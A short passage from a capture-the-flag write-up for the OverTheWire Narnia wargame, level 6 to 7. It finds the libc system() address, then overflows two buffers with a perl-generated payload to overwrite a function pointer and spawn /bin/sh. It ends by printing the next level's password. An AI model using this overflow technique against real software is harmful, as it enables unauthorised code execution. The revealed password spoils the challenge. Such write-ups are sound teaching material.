tylerdionne/OverTheWire-Narnia-Write-ups/Level 6 -> Level 7/README.md

 $1 = {int (const char *)} 0xf7c48170 <__libc_system>
 So now we now that 0xf7c48170 is the address that points to system() in the libc library.

+So fill b1 with 8 A's then overwrite the address poitned to by fp.
+Then fill b2 with 8 B's then overwrite the junk stored in b1 with the command we want to execute.

 $ ./narnia6 $(perl -e 'print "AAAAAAAA\x70\x81\xc4\xf7\ BBBBBBBB/bin/sh"')
 $ cat /etc/narnia_pass/narnia7
 Pass: YY4F9UaB60